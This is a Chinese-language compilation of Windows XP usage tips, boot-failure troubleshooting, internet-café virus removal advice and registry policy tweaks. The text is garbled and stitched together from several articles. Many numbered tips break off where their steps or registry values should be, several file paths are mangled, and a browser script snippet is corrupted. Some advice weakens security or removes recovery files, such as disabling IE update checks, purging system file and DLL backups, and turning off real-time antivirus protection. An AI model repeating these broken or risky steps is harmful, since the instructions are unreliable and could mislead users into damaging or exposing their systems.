XP中新增了文件夹图片功能,它提供了比原来的图标内容更多丰富的图片资源供用户选择,你可以利用这一功能把自己喜欢的任意图片设为文件夹图标,方法是:在资源管理器选中任一文件夹,右键单击,选择“属性”命令,在打开的对话框中选择“自定义”选项卡,单击“选择图片”按钮选择作为文件夹图片的图形文件,单击“更改图标”按钮可以文件夹图标,然后单击“确定”即可,以后你在资源管理器中选择以“缩略图”形式查看文件时,就可以看到你定义的文件夹图片。 50.快速移动和复制文件 在资源管理器中选中你要移动或复制的文件,然后用鼠标右键将文件拖动目的文件夹后松开,会弹出一个菜单,允许你选择复制、移动文件还是创建一个快捷方式,甚至可以取消。 51.自动打开Windows资源管理器 有些情况下,借助Windows资源管理器来浏览文件夹要比直接打开每个文件夹并查看其中内容更加直观方便。一般我们可以在文件夹上单击鼠标右键并从中选择资源管理器,然而如果你有双击鼠标的操作习惯,那么我们还能够以更加快捷的方式打开文件夹。首先打开我的电脑,从工具菜单中选择“文件夹选项”,单击“文件类型”选项卡。在文件类型列表中,选择“文件夹”并单击“高级”按钮,在编辑文件类型对话框中,选择资源管理器,并单击“设为默认值”按钮。单击“确定”之后,再单击关闭。现在,当你在任意文件夹上进行双击时,将自动打开Windows资源管理器视图。
Windows XP垃圾箱的默认位置是在桌面的右下角,在底部系统托盘的上面。如果用户打开多个窗口,则会挡住垃圾箱,使用户无法拖曳文件及文件夹至垃圾箱。为此,微软专门做了非常人性化的设计,当用户拖动一批文件并移至桌面右下角时,用户可以拖动鼠标并将所有文件移至桌面最下方任务条的空白区域,并在那里停留几秒钟,届时所有打开的窗口将会自动最小化,从而允许用户将文件拖至垃圾箱。另外,无论打开的多个窗口是否最大化,用户执行上述操作均可以实现让所有窗口最小化的效果。
Windows 2000操作系统中用户在设置文件夹的共享属性时操作非常简便,只需用鼠标右击该文件夹并选择属性,就可以找到共享设置标签,来设置文件夹的访问权限,只允许特定用户访问,可在Windows XP中却找不到这个功能了。难道在Windows XP中不能使用这个功能吗?其实不然,你可以这样操作:打开“我的电脑”中的“工具”,选择“文件夹属性,调出“查看”标签,在“文件和文件夹”部分将 “使用简单文件共享(推荐)”项前面的选择取消,这样修改后用户就可以象使用Windows 2000一样对文件夹属性进行方便修改了。 54.快速拷贝文件 我们一般都是过一段时间就把硬盘上的文件分类整理一下,把图片放在picture文件夹中,mp3文件放在music文件夹中等等,但来回复制、粘贴真的很烦琐,现在让我们用一个简单的方法快速拷贝文件。选中一个文件夹如music,点鼠标右键创建一个快捷方式,复制这个快捷方式,在C:\Documents and Settings\用户名\SendTo文件夹中粘贴此快捷方式。
某个目录对你很重要吗?让它有个与众不同的图标吧,这样辨认起来也容易。用记事本在你的目录内新建一个文件,文件名叫作Desktop.ini,将下面这两行输进去: 56.彻底隐藏文件 每个人的机器上都或多或少有一点不愿意别人看见的东西,怎么办,直接隐藏起来吗?一打开显示隐藏文件就什么都看见了,其实你只要在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ 57.取消共享文档 默认情况下,在Windows XP中打开我的电脑,会看到在硬盘图标上方有一些文件夹。这些就是“共享文件夹”,这里有每一个用来户共享文件所用的文件夹。我们可以让这些文件夹在我的电脑中消失,原理很简单,只要打开注册表找到如下位置: 58.按指定文件夹启动资源管理器 在Windows XP中,可以使用“资源管理器”和“我的电脑”管理文件和文件夹,但本人更偏爱使用“资源管理器”。因为利用“目录树”的结构方式,可以快速找到所需文件或文件夹,如果是复制或移动文件或文件夹,那就更方便了。可是在默认情况下,每次定位于“资源管理器”时总是打开“我的文档”文件夹,能不能自己指定一个文件夹呢?首先在“开始/所有程序/附件”中找到“资源管理器”,在“资源管理器”上单击右键,选择右键菜单中的“属性”命令,在“快捷方式”选项卡中,目标文本框内容是“%SystemRoot%explorer.exe”(如果你的Windows XP安装在C盘,应该是“c:Window说什么explorer.exe”),只要略作一下修改,就可满足要求了。例如我经常打开的是h盘中的user文件夹,将目标文本框内容修改为“%SystemRoot%explorer.exe /e,h:user”,在“exe”与“/e”之间一定要加上一个空格。好!大功告成了,现在你再打开“资源管理器”,就直接进入了user文件夹了。另外还有一种解决方法呢,还是以启动“user”文件夹为例,首先在桌面上为文件夹“user”建立快捷启动方式,单击右键,在弹出菜单中选择“资源管理器”命令,打开“资源管理器”后就直接进入了“user”文件了。 59.在任务栏上显示星期与曰期 这个其实不需设置,只要将任务栏拉高一点就可以了。方法是:将鼠标移到屏幕下边的任务栏的上边线位置,当鼠标指标变成双箭号时,按下左键,往上拖拉至两行高位置即可。系统托盘处即显示时间,曰期及星期。 60.快速锁定计算机 如果你因为有急事而需要离开,但又不希望电脑进行系统注销。这时你可以选择“新建/快捷方式”,接着系统便会启动创建快捷方式向导,在文本框中输入rundll32.exe user32.dll,LockWorkStation,单击“下一步”,在弹出的窗口中输入快捷方式的名称。比如我们可将它命名为“锁定计算机”或选用你所喜欢的任何名称,单击“完成”。以后,我们就可以简单地点击这个快捷方式,锁定计算机。 61.禁止IE的定期更新 在我们上网以后,Windows XP经常会在任务栏上弹出一个提示你升级系统文件的消息,其实这是IE浏览器的定期更新检查在作怪,大约每30天左右,Windows XP系统附带的IE6.0就会定期检查是否有新的升级软件,如果有,你没有下载升级,便会弹出上述提示对话框,我们可以采用下面的方法来禁止IE6.0的定期更新检查:打开“运行”对话框,输入“gpedit.msc”,打开“组策略”设置窗口,在左边的树形目录中找到“计算机配置/管理模板/Windows组件/Internet Explorer”,在右边的窗口中找到“禁用定期检查Internet Explorer软件更新”选项,打开该选项,在出现的窗口中选择“已启动”,最后单击“确定”按钮即可。 62.找回XP的安装密码 在9X时代,如果忘记了Windows的安装密码,只要到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion,察看一下ProductKey就可以了,可是在XP的注册表中怎么找不到呢?其实不需要到注册表中,打开Windows\System32,这儿有个叫$winnt$的配置文件,里面已经有清楚的记载了。 63.IE的全屏幕模式 一般都知道,在IE里按下F11键就可以快速切换到全屏幕模式,不过我们这里所说的全屏幕模式是指一个不包括工具栏、状态栏的纯全屏模式。要达到这种效果,启动IE时需加上一个参数,在命令行里输入C:/Program Files/Microsoft Internet/IEXPLORE.EXE -k,就可以打开一个全屏幕的IE了。 64.与Internet时间同步 不知你是否注意到现在有许多软件都可以让你电脑的时钟变得准确,其原理就是该软件选择一个服务器,当你上网的时候电脑内的时钟与服务器的时钟相比较,如果不准确的话就可以自动调整过来。而如今在Windows XP也集成了这一功能。我们可以双击任务栏右下角的时钟,在“Internet时间”中进行调整。需要注意的是:如果你的电脑安装了防火墙,那么很有可能不能进行Internet时间调整。 65.禁止隐藏不活动的图标 在使用一段时间后,Windows XP会自动检测并隐藏不活动的图标,我们可以通过下面的方法来禁止它:在任务栏的空白处单击鼠标右键,在弹出的快捷菜单中选择“属性”,在“任务栏”标签中将“隐藏不活动的图标”取消即可,如果你不想完全禁止这项功能,可以单击“自定义”按钮,自行设置有关项目的隐藏和显示。 66.使每次打开IE时的窗口都是最大化 通过快捷方式启动IE,例如通过快速启动工具栏中的图标启动IE时,您可以右击“快捷方式图标”,选择“属性”,在“快捷方式”选项卡中的“运行方式”选项栏中选择“最大化”,然后单击“确定”按钮。此后,无论什么时候您通过这个快捷方式启动IE,浏览器的窗口总处于最大化状态。通过桌面的“Internet Explorer”图标启动IE时,因为这不是一个标准的快捷方式,所以没有最大化选项。幸运的是,这个图标可以记住最近一次您使用浏览器的窗口的设置情况。因此,如果当您退出IE前将窗口最大化,那么下次启动IE时仍然会保持此次退出时的窗口设置。 67.让欢迎窗口更清晰 Windows XP系统的显示效果得到了较大提高,这主要是基于它使用了名“ClearType”的清晰化技术,该技术特别让使用笔记本电脑及液晶显示器的用户在运行Windows XP操作系统时感受到与以往系统不同的效果。但由于该清晰效果只有当Windows启动完毕后才能调用,因此在系统启动过程中的欢迎窗口仍然无法实现这一效果。为了使欢迎窗口更加清晰,用户可以使用注册表编辑器进行修改,寻找到这两个主键: 68.屏蔽弹出的广告窗口 当你打开一个网站就会发现也弹出另一个广告页面,页面开多了,电脑运行速度就会大大地变慢。一些禁止弹出广告页面(俗称“黑名单”)的软件就应运而生,其实在Windows XP自带的IE6.0中也有禁用黑名单的功能,打开浏览器,单击“工具/Internet选项/安全”,打开“安全”页面,在“安全设置”中选择“受限制的站点”,并点击“站点”按钮,在弹出的窗口中输入禁止弹出广告页面的地址,再单击“添加”,“确定”,讨厌的广告窗口就不见了! 69.恢复桌面上的系统图标 通常很多用户还是习惯于在桌面上保留“我的文档”及其它经常访问文件夹快捷方式以及经常使用的程序快捷方式。如果你想在桌面上显示“我的电脑”、“我的文档”、“网上邻居”、IE浏览器的快捷方式图标,只需进行如下操作:在桌面点击鼠标右键,在右键菜单中选择“属性”命令,在打开的“显示 属性”对话框中选择“桌面”选项卡,单击“自定义桌面”按钮,打开“桌面”项目对话框。在“常规”选项卡的“桌面图标”栏中选择所需项目的复选框,然后单击“确定”返回上一级对话框,再单击“应用”按钮即可。 70.设定系统异常停止时Windows XP的对应策略 我们还可以在系统正常时,设定当系统出现异常停止时,Windows XP的反应措施,比如我们可以指定计算机自动地重新启动,步骤如下:鼠标右键单击“我的电脑”,在弹出的快捷菜单中选择“属性”,打开“系统属性”设置窗口,选择“高级”标签,打开“高级”选项卡,在“启动和故障恢??”选项区域中单击“设置”按钮,打开“启动和故障恢复”对话框,在“系统失败”选项区域中,通过启用复选框可以选择系统失败后的应对策略,在“写入调试信息”选项区域中可以设置写入系统调试信息时的处理方法,设置完毕,单击“确定”按钮返回“系统属性”对话框,再单击“确定”按钮。
71.采用Windows 98/2000的窗口风格 有些人可能不喜欢Windows XP的窗口风格,想恢复原来的Windows 98/2000的界面,怎么办?在桌面空白处单击鼠标右键,在快捷菜单中选择“属性”,在弹出的窗口中选择“主题”标签,从“主题”的下拉菜单中选择“Windows经典”,然后选择确定就可以了。 72.添加“显示桌面”项 在默认安装下,我们在任务栏中找不到熟悉的“显示桌面”按钮,难道Windows XP中没有这个非常好的功能了吗?其实不是,你依次单击“开始/设置/控制面板/任务栏和开始菜单”,在“任务栏和开始菜单属性”窗口中,将“显示快速启动”选项打上勾,“显示桌面”项就会出现在任务栏中了。 73.隐藏桌面图标 在Windows XP中增加了隐藏桌面图标的功能,你只需用鼠标单击桌面空白处,在弹出的右键菜单中选定“排列图标”命令,然后在其下一级级联菜单中取消对“显示桌面图标”命令的选定,系统就会自动将所有桌面图标隐藏。 74.取消快捷方式图标上的箭头 当你安装一些软件后,通常Windows XP桌面上会被放置一些快捷方式图标,可以让方便地启动应用程序。只是这些应用程序的快捷方式图标上出现的黑色箭头,非常影响桌面美观。如果你想将黑色箭头去除,只需进行如下操作: 75.快速打开控制面板 把鼠标移动到“开始”按钮上,点鼠标右键,选择“属性/自定义/高级/开始菜单项目” 76.将所喜爱的程序放置在开始菜单顶部附近 你是否对某个程序非常喜爱且经常使用呢?那么,应通过将其放置在列表顶部的方式提高它在开始菜单中的优先级。这种方式能够确保该程序保持在开始菜单中,且不受其它程序的干扰,即便其它程序具有更高的使用频率也是如此。 77.去掉桌面图标文字的阴影 以前版本的Windows在用自定义桌面的时候,图标的文字下面都有阴影(就是你的桌面颜色),影响了桌面的视觉效果。原来只能借助其他软件解决,但是性能不稳定,又占用系统资源。Windows XP帮你解决了这个问题!只要你打开电脑属性——先用右键单击“我的电脑”,在弹出的菜单中选“属性”,然后在“高级”选项卡中的“性能”框中点“设置 78.自动关闭电脑 安装完Windows XP之后,有些计算机在点击关闭电脑之后并不能自动关闭,而需像以前的AT电源一样手动关闭。这主要是Windows XP未启用高级电源管理。修正的方法是:点击“开始/控制面板/性能和维护/电源选项”。在弹出的电源选项属性设置窗口中,点击“高级电源管理”,将“启用高级电源管理支持”打上勾。 79.备份硬件配置文件 硬件配置文件可在硬件改变时,指导Windows XP加载正确的驱动程序,如果我们进行了一些硬件的安装或修改,就很有可能导致系统无法正常启动或运行,这时我们就可以使用硬件配置文件来恢复以前的硬件配置。建议用户在每次安装或修改硬件时都对硬件配置文件进行备份,这样可以非常方便地解决许多因硬件配置而引起的系统问题。备份的步骤如下:鼠标右键单击“我的电脑”,在弹出的快捷菜单中选择“属性”命令,打开“系统属性”对话框,单击“硬件”标签,在出现的窗口中单击“硬件配置文件”按钮,打开“硬件配置文件”对话框,在“可用的硬件配置文件”列表中显示了本地计算机中可用的硬件配 80.缩短等待时间 打开注册表编辑器,找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control,将 WaitToKillServiceTimeout 设为:4000(原设 81.让系统自动关闭停止响应的程序 打开注册表 HKEY_CURRENT_USER\Control Panel\Desktop 键,将 AutoEndTasks 值设为 1(原设定值:0)。 82.加速共享查看 打开注册表编辑器,把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ 83.优化“启动和故障恢复”设置: 84.关闭华医生Dr.Watson: 在开始->运行中输入drwtsn32命令,或者开始->程序->附件->系统工具- 85.关掉快速切换功能: 方法如下:控制面板 >用户帐户,点击“更改用户登陆或注销方式”,去掉“使用快速 86.定制特殊的启动提示 87.关闭windows的文件保护 88.windowsXP的内存优化!!!!!!!!!!!!(警告!!!!!以下设置需要有256M以上的内存才能有 89.修改磁盘缓存以加速xp 磁盘缓存对xp运行起着至关重要的作用,但是默认的I/O页面文件比较保守。所以,对于不同的内存,采用不同的磁盘缓存是比较好的做法。 a.)运行 regedit; b.)去[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\IoPageLockLimit]; c.)根据你的内存修改其十六进制值: d.)重启 90.减少磁盘扫描等待时间
93.关掉视频预览
files\ComPlus Applications 目录,没东西可以把这个服务关 功能 95.卸载无用的动态链接 资源管理器经常在内存中留下无用的动态链接,为了消除这种现象,你可以打开注册表编辑器,设置键值:HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\Windows\CurrentVersion\Explorer\AlwaysUnloadDLL(字符串值)将其设为1 96.在关机时清空页面文件 97.Windows XP 安装好后,如何把FAT 32转化为NTFS 使用convert命令,在命令行模式下用convert.exe这个命令随时转化的。例如:convert c: /fs:ntfs把c盘转化为NTFS 98.验证Windows XP是否已激活 在运行中输入“oobe/msoobe /a”;版本号可以通过WINDOWS(XP安装目录)system32/NTOSKRNL.EXE,鼠标右键 -> 选内容查看即可 99、删除Windows XP中不需要的组件 1)、删除系统文件备份,执行sfc.exe /purgecache 2)、删除驱动备份,删除WINDOWS(XP安装目录)\driver cache\i386目录下的Driver.cab文件 3)、删除DLL备份文件,目录为WINDOWS(XP安装目录)\system32\dllcache, 4)、删除WINDOWS(XP安装目录)\ime下不用的输入法 100.让IE使用多线程下载网页:注册表子键:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings,
104.在保存网页前,可以按一下ESC键(或脱机工作)再保存,这样保存很快 105.用电脑听CD可以不用任何的播放软件,把音箱线直接接到光驱的耳机孔,放入 CD,按光驱上的play键就可以直接听了,这样听歌可以不占用系统资源。(如 果你的电脑坏了,不能启动或什么的,一时放在那不能修,千万不要浪费资源 ,把用里面的电源给光驱通上电,就可以暂时做CD机了. 106.MSN中发消息的时候是按enter的,如果想要换行而不想发出消息,可以 shift+enter或ctrl+enter 107.浏览器的地址栏里可以调试简短的HTML代码。方法如下: 地址栏写 about :abc 回车,就看到效果了. 108.Windows快捷键: 109.RUN - > cmd 或者command 110.con、nul是MS系统的保留名,它不能做为文件名!检查你的web空间是不是M$ 系统,可以建一个con的文件夹试试 111.想把自己的某个文件夹的文件做一个列表? 用什么软件呢? 不用,直接在命令 行下输入 tree /f > index.txt.打开index.txt看一下是不是一目了然 112.保存无边窗口页面请用CTRL+N新开窗口 113.如果一个文件夹下有很多文件,如果想快速找到想要的文件,先随便选择一个 文件,然后在键盘上选择想要的文件的第一个字母就可以了 114.说个QQ隐身登陆的笨办法: 115.win98改ip不重启的办法: 116.2000和xp下运行cmd,进入dos窗口,复制和粘贴都用右键完成 117.收藏夹不要放在系统盘,以免忘了备份,每次装完系统用超级魔法兔子“指 定路径 118.对于系统不明白的地方,平时多看windows自带的帮助,不要盲目去找人解决 ,也许帮助才是最快和最全的。(其余软件也是同理) 119.winxp自带批量重命名功能,只要选中一堆文件,选重命名,然后改第一个文 件,改完后,其他文件也会自动修改 120.上网时在地址栏内输入网址,系统会记录下来,虽然方便以后不用再重复,不 过如果是公用的机子,又不想让别人知道自己到过哪些地方,可以用“CTRL+ O(字母O,不是0)”,这时对弹出一个“打开”对话框,在其中的地址栏内 输入网址,就不会被记录下来了. Ctrl+W关闭窗口 122.如果你用foxmail,邮箱路径不在默认位置,可以修改account.cfg 123.NTFS分区上文件属性中有个“摘要”功能,很有用的,这样一些软件安装程序 是什 124.在IE的地址栏输入: javalert(文档.lastModified)可以得到网 页的更新曰期. 125.通过网络共享时,尽量使用运行,\ip地址共享文件名,而不要使用通过 “网上邻 126.在98下快速做启动盘,只要把windows/command/edb下的所有文件复制到干净 的软盘中就可以做98启动盘 127.运行pq分区失败,出现不可识别的分区,只要找到pq安装目录UTILITY的 PTEDIT32.EXE,可以把原分区还原为原来格式. 打开资源管理器,选中文件夹,用小键盘的*,可以把这个文件夹中的所存在的 所有子文件夹迅速列出 128.QQ自己加自己的方法:在黑名单中加自己,然后再把自己拖到我的好友中就可 以了,然后再运行注册向导. 129.如果浏览的页面中应用了java脚本禁用了鼠标右键,解决的方法: 130.realplay多曲播放. 131.windows下文件可以只有扩展名 新建一个文本文档另存为.txt.前面什么也不要加,就可以了,但是你不能重 命名为这样的文件名!要用另存为! 132.IE真正的空白页: 133.快速启动RealOnePlayer的技巧:在Real的文件夹下搜索netid.smi和 getmedia.ini 134.跳过开机画面 135.创建浏览目录的快捷方式 136.改变关机画面: 137.这个 .exe 用了哪些 .dll? 对应用程式右键单击,选 快速检视 138.厌倦图形介面了吗 想念以前先进入 dos 在打 win 进窗户吗在 msdos.sys 中加入这一行BootGUI=0 139.在 win95的MS-DOS下使用长文件名 140.加快软驱传输速度 《桌面管理界面》DMI是英文单词Desktop Management Interface的缩写,也就是桌面管理界面,它含有关于系统硬件的配置信息。计算机每次启动时都对DMI数据进行校验,如果该数据出错或硬件有所变动,就会对机器进行检测,并把测试的数据写入BIOS芯片保存。所以如果我们在BIOS设置中禁止了BIOS芯片的刷新功能或者在主板使用跳线禁止了BIOS芯片的刷新功能,那这台机器的DMI数据将不能被更新。如果你更换了硬件配置,那么在进行WINDOWS系统时,机器仍旧按老系统的配置进行工作。这样就不能充分发挥新添加硬件的性能,有时还会出现这样或那样的故障。
如果我们在启动计算机时看到上述这个信息后,系统长时间停止不前或处于死机状态,对于机器此类故障一般很难处理。因为不能像进入系统后出现的故障,我们可以检查系统日志之类的文件进行分析。不过,根据PC机启动的过程原理分析,出现这条信息时一般有以下的可能情况: 1.硬件改变 当主机的硬件配置有所变化,但是我们使用的是POST功能时,此时系统不能识别新添加的硬件,将会按老的配置进行工作,此时就会出现开机后能够加电,但是没有正常启动时“嘀”的一声,同时显示器也没有图像显示,只有风扇转动的声音。 还有一个原因是新添加的硬件的兼容性不好,导致上述的情况出现。 2.BIOS设置改变 当BIOS设置错误时,比如内存的读写参数设置有误,硬盘的模式设置有误,板载声卡与集成声卡的设置有误等情况,都会造成不能正常启动。 3.硬盘线连接错误 这类情况有硬盘的数据线接触不良,数据线质量低劣造成数据数输时错误太多,数据线插接有误(接主板端与接硬盘端倒个儿),主从硬盘跳线有误,硬盘容量或模式设置有误等。 4.硬盘主引导区内容被破坏 当硬盘的主引导区内容被其他程序改写或被病毒破坏掉,也可能时硬盘分区表被清除或人为的设置成逻辑锁状态时,就会到此时死机。 对于硬盘的主引导区的引导程序被破坏,我们可以使用Fdisk/MBR命令进行修复,或者使用KV3000的磁盘编辑功能查找0道0面的其他62个扇区是否有备份的主引导区程序,将其还原至0道0面0区即可。 对于分区表被破坏的就比较麻烦。如果只是分区表没有“80”标志或者多个“80”标志,或者没有”55AA”标志的,我们只要使用KV3000的磁盘编辑功能进行手动修复就可以了。如果是逻辑锁,就需要制作特殊的磁盘进行解锁。如果分区表被完全破坏或者被加密,那我们就只能重新分区了。 5.硬盘有故障 现在硬盘的容量越来越大,速度越来越快,不过硬盘的质量好像也越来越差了。到目前市场上还有94,95年份生产的几百M的二手硬盘在卖呢。可现在呢,刚买的新硬盘,没几天就会坏道成片或者莫名妙的丢失数据,再不就是“咣咣”的提意见罢工不干了。当硬盘硬件出现故障时,也会出现上述的情况,此类问题硬盘在CMOS里能够认到硬盘,认盘很顺利,但就是进不了系统,无法正常分区和格式化。 6.主板有问题 与主板有关的也主要是主板的硬盘控制器的问题,造成数据传输不稳定,错误率太高。 7.超频造成的损坏 如果我们超频过头时,也会出现开机后到硬盘这儿就死机。这时我们最好住开机自检时显示的CPU的频率是多少,再打开机箱检查实际CPU的频率是多少,二者是否相同。特别对于PIV以后的CPU,其集成度极高,如果我们超频使用,极有可能造成CPU内部的电子在短时间内过度衰减,导致CPU短时间内报废。 解决的方法: 1.恢复硬件改变前的状态,检查系统是否能够正常启动。 2.检查所有连接线或扩展卡是否正确连接。 3.试着重新配置在BIOS中“PNP/PCI configuration”“Reset Configuration Data”也可以使用“Force Update ESCD”之类的BIOS选项设置为“Enabled”,然后存盘退出。如果能够不能启动,再试着设置为“Disabled”试一试。 4.查阅主板手册关于CMOS跳线的的信息并清除CMOS。请注意:在清除CMOS设置时必须拔掉主机电源线或者把主机电源的开关设置为off或0。 5.断开硬盘连接线,包括光驱或其他IDE设备,再进入BIOS设置选择启动顺序为软盘启动后按F10存储退出,然后在软驱中放入一张可启动的系统盘,检查系统是否能够正常启动。 6.在完成清除CMOS设置后,把CMOS设置中的“PNP/PCI configuration”选项设置为“Enabled”,再次重新启动电脑来更新设置DMI数据,也叫做强制更新ESCD数据。 7.如果主机能够通过软盘启动,但是不能通过硬盘启动,这种情况有可能是硬盘的主引导区的数据被破坏,这时可以通过分区软件来修复主引导区的程序代码,如用软盘启动电脑后,使用FDISK/MBR命令来修复主引导区。也可以到相应硬盘生产商的网站下载特殊的硬盘分析工具程序,来检查自己的硬盘的具体故障。 8.如果经过上述设置后还不能排除故障,这时应考虑是主板或硬盘的IDE接口的问题,可以通过替换法解决。 《几种常见的杀毒方法》几种常见的杀毒方法
有过网吧或者机房管理经验朋友肯定知道,如果机子中了病毒的话是很让人头疼的事情,现在的病毒大多都具有复制能力特别强,能够通过局域网传播,大量耗费系统资源等特点,一个局域网内只要有一台机子中了病毒,如果不及时的杀毒和隔离的话,其他的机子很快便会感染病毒,如何防止病毒,和快速的杀毒成了每个网管所迫切考虑的事情。 其实网吧内的常见的病毒有两种,一种是类似与CIH的病毒这种高破坏性的病毒,中了之后系统会无法启动,这种病毒的危害大,但是中毒的几率相对很少;另一中就是脚本病毒。这类病毒一味的耗费系统资源,直到系统崩溃死机,比起CIH病毒来说,它们看似很不起眼,但却做让人头疼。有没有克制脚本病毒的方法呢?笔者在实践中总结了以下几条经验。 第一,装系统的时候要用光盘启动硬盘来装,光盘要保证以前用过的没有携带病毒的,硬盘一定要没有任何文件,否则残留的文件里面很可能就感染了病毒,这一点一定要毫不留情,不要为了要备份一个驱动或者一个软件不把它删除。否则你刚装完系统发现已经中了病毒,那可就后悔莫及了。 第二,装完系统后,再装驱动之前,最好先用装个杀毒软件,杀毒软件首先要保证自己没有病毒,其实你可以把WIN98安装文件,杀毒软件等,网吧机器的驱动放在一起用EasyBoot做个启动光盘。有了这张盘,你在装其他软件和游戏之前就可以保证母盘不感染病毒了。 第三,装好驱动后先上网把杀毒软件更新到最新,然后开着病毒防火墙,从事先准备好的机器上调用软件和游戏的安装文件来安装网吧的必备软件和常玩的游戏,一切都弄好后测试一遍游戏和软件,然后在C盘目录下建立一个ADMIN的文件夹,把专杀工具包,硬盘工具包,网络克隆工具,还有备份的注册表放到里面备用。一般样板盘做成这样就很好了,当然如果系统配置不高,为了不影响玩游戏的速度,在克隆完之后要把病毒防火墙的自启动取消。 装杀毒软件不是让它老开着防火墙,因为一来它耗费系统资源,二来平时安装着还原精灵,有病毒重启一下就好了,它主要用在以后升级游戏或者调用文件的时候把防火墙打开防止调用文件中的病毒感染系统,更何况人非圣贤,孰能无过,再谨慎的人也不会保证以后肯定不会出病毒,所以一定要为每台机子装上杀毒工具,但平时没必要启用它的保护功能。 在网络上的人肯定都中过爱情森林,新欢乐时光等这些顽固的病毒,尤其是在局域网里,往往是所有的机子都感染病毒,每个机子能杀出几百个到上千个病毒,我曾经在一台机子上用瑞星杀出过8000多个病毒。 这些病毒非常恶劣,一般在WINDOWS下是不容易杀干净的,每次杀完病毒,紧接着再杀的时候就会发现杀毒软件本身还有EXPLOR.EXE等进程依然感染着病毒,你无论怎么杀也杀干净,这样的话最好是重起到安全模式下再杀,杀毒的时候不要打开任何的窗口,因为有些病毒只要你打开窗口就会激活,它占用到内存的话就很难清除了。杀完后重起再进安全模式再杀,一般这样几次病毒就会杀干净了。如果还不行的话就要到DOS下查杀了,一般的杀毒软件都有它的DOS版本。重启动到纯DOS模式下,跳转到安装目录下运行那个程序会有个提示,不过这样查杀病毒的速度一般很慢。值得注意的是如果所有的机子都中了病毒的话,一定要把交换机关掉一台一台的杀,杀完后备份C盘,并用保护卡保护起来。 脚本病毒这样清除就可以了,但是对于CIH等病毒来说,除了杀完毒后还有做恢复工作,一般来说它就是破坏分区表和主引导程序,严重的话破坏BIOS。我们可以分别来对待,如果损坏的仅仅是主引导记录,可以用干净的启动软盘或光盘启动系统运行fdisk /mbr就可以了,也可以用DISKMAN,DISKGEN等小工具来重建主引导记录。如果损坏的是分区表,首先考虑的是用DISKMAN的恢复分区表功能,破坏的不太严重的话一般可以恢复的。不过,如果你对磁盘结构,分区表,I/O表,FAT表不熟悉的话,笔者还是建议专业人员来修理好些,毕竟这样安全系数更大。 《老虫的电脑维护心得》老虫的电脑维护心得 1、定期整理硬盘 严重的硬盘碎片会大幅度降低你的电脑响应速度。所以你就需要定期的对磁盘进行清理,磁盘清理非常简单,首先单击“开始”,依次指向“所有程序”、“附件”、“系统工具”,然后单击“磁盘清理”。如果有多个驱动器,会提示您指定要清理的驱动器。 一、释放磁盘空间 通过释放磁盘空间,可以提高计算机的性能。磁盘清理工具是 Windows 附带的一个实用工具,可以帮助您释放硬盘上的空间。该实用工具先标识出可以安全删除的文件,然后允许您选择希望删除部分还是全部标识出的文件。 磁盘清理工具功能: •删除 Internet 临时文件。 •删除下载的程序文件。 •清空回收站。 •删除 Windows 临时文件。 •删除不使用的可选 Windows 组件。 •删除已安装但不再使用的程序。 提示:通常情况下,Internet 临时文件会占据大多数的空间,因为为了加速以后的访问,浏览器会缓存您访问的每个页面。 使用磁盘清理工具 1.单击“开始”,依次指向“所有程序”、“附件”、“系统工具”,然后单击“磁盘清理”。如果有多个驱动器,会提示您指定要清理的驱动器。
“磁盘清理”工具计算您可以释放的磁盘空间量 选择要删除的文件 单击“分析”将启动磁盘碎片整理程序 大多数情况下,请选中“扫描并试图恢复坏扇区” 《回收站里暗藏的小秘密》
《WinXP最新操作技巧》不为人熟知 WinXP最新操作技巧
微软的Windows Vista今年还发布不了,虽然我们使用Windows XP操作系统已经要满五年了,很多功能我们都熟得不能再熟了,但是人无完人,总有你不知道的技巧,比如下面介绍的这些。本文我们就给大家介绍一些不为人熟知的Windows XP操作技巧。 禁止修改“我的图片”的硬盘路径 启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“DisableMyPicturesDirChange”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 不显示“我的图片”选项 启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoSMMyPictures”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 禁止修改“我的音乐”的硬盘路径 启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“DisableMyMusicDirChange”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 不显示“我的音乐”选项 启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoStartMenuMyMusic”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 禁止修改“我的文档”的硬盘路径 禁止修改“我的文档”的硬盘路径启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“DisablePersonalDirChange”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 又或可透过群组原则来将达到目的,方法: 先以系统管理员的身份登入,到“开始”-->“运行”,键入“gpedit.msc”进入群组原则的设定,在“本机计算机原则”下打开“使用者设定”-->“系统管理模板”-->“桌面”-->禁止使用者变更“我的文档”路径便可。 不显示“我的文档”选项 启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoSMMyDocs”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 限制“我最近的文档”显示的数目 启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“MaxRecentDocs”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 不显示“我最近的文档”选项 启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoRecentDocsMenu”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 停用“安全地删除硬件”项目 启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoStartMenuEjectPC”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 不显示“我的计算机” 